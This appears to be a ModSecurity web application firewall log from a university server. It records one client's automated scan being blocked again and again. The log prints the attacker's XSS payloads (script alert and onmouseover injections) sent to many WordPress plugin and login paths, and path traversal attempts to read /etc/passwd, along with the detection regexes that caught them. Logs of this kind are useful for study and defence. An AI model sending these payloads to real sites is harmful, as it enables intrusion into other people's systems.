[Tue Aug 29 11:56:04.683908 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:sortBy. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:sortBy: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO16ZMCo-f0AAAq@seMAAAAM"]
[Tue Aug 29 11:56:05.553442 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:page: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/simpel-reserveren/edit.php"] [unique_id "ZO16ZcCo-f0AAAqSw6AAAAAN"]
[Tue Aug 29 11:56:05.761150 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:ID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:ID: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php"] [unique_id "ZO16ZcCo-f0AAApbUvIAAAAh"]
[Tue Aug 29 11:56:06.711874 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:submit: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php"] [unique_id "ZO16ZsCo-f0AAAqeFjIAAAAx"]
[Tue Aug 29 11:56:07.542273 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:tab. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:tab: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO16Z8Co-f0AAArC7fMAAAAW"]
[Tue Aug 29 11:56:07.669703 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:title_az. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:title_az: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/e-search/tmpl/title_az.php"] [unique_id "ZO16Z8Co-f0AAAqTv2IAAAAa"]
[Tue Aug 29 11:56:08.555204 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/plugins/content/jw_allvideos/includes/download.php"] [unique_id "ZO16aMCo-f0AAAqY6RUAAAAr"]
[Tue Aug 29 11:56:08.623655 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:count: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/goform/activate_process"] [unique_id "ZO16aMCo-f0AAApbUv8AAAAh"]
[Tue Aug 29 11:56:10.532162 2023] [:error] [pid 2743] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:size. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:size: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/wp-symposium/get_album_item.php"] [unique_id "ZO16asCo-f0AAAq3a60AAAAI"]
[Tue Aug 29 11:56:10.594908 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:backurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:backurl: 1 onmouseover=alert(/document.domain/) y="] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/plugins/template/login.php"] [unique_id "ZO16asCo-f0AAArC7g4AAAAW"]
[Tue Aug 29 11:56:11.645537 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:uid: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/login/"] [unique_id "ZO16a8Co-f0AAArC7hIAAAAW"]
[Tue Aug 29 11:56:11.652075 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:returnTo. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:returnTo: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/login.html"] [unique_id "ZO16a8Co-f0AAAqY6SkAAAAr"]
[Tue Aug 29 11:56:12.532055 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:uid: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO16bMCo-f0AAAq@shoAAAAM"]
[Tue Aug 29 11:56:12.651058 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:urll. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:urll: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/r2w/signIn.do"] [unique_id "ZO16bMCo-f0AAAq5@N4AAAAK"]
[Tue Aug 29 11:56:13.618653 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:UID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:UID: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/ie50/system/login/SysLoginUser.aspx"] [unique_id "ZO16bcCo-f0AAApHRl4AAAAP"]
[Tue Aug 29 11:56:15.033251 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16b8Co-f0AAArC7iUAAAAW"]
[Tue Aug 29 11:56:15.033288 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:UID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:UID: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/system/login/SysLoginUser.aspx"] [unique_id "ZO16b8Co-f0AAAocyfcAAAAR"]
[Tue Aug 29 11:56:15.699413 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:aoid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:aoid: <script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php"] [unique_id "ZO16b8Co-f0AAAq@siwAAAAM"]
[Tue Aug 29 11:56:17.155745 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:serviceestimatekey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:serviceestimatekey: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/car1/estimateresult/result"] [unique_id "ZO16ccCo-f0AAApHRmkAAAAP"]
[Tue Aug 29 11:56:17.157756 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:button. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9 found within ARGS:button: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/kindeditor/php/demo.php"] [unique_id "ZO16ccCo-f0AAAqeFmMAAAAx"]
[Tue Aug 29 11:56:17.669591 2023] [:error] [pid 2742] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:button. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9 found within ARGS:button: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/php/demo.php"] [unique_id "ZO16ccCo-f0AAAq2KgwAAAAE"]
[Tue Aug 29 11:56:18.807321 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16csCo-f0AAApXguQAAAAU"]
[Tue Aug 29 11:56:19.667655 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:ver. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:ver: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php"] [unique_id "ZO16c8Co-f0AAAqeFnUAAAAx"]
[Tue Aug 29 11:56:21.997586 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:section. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:section: ../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16dcCo-f0AAAqeFn8AAAAx"]
[Tue Aug 29 11:56:22.055318 2023] [:error] [pid 2761] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16dsCo-f0AAArJXlAAAAAZ"]
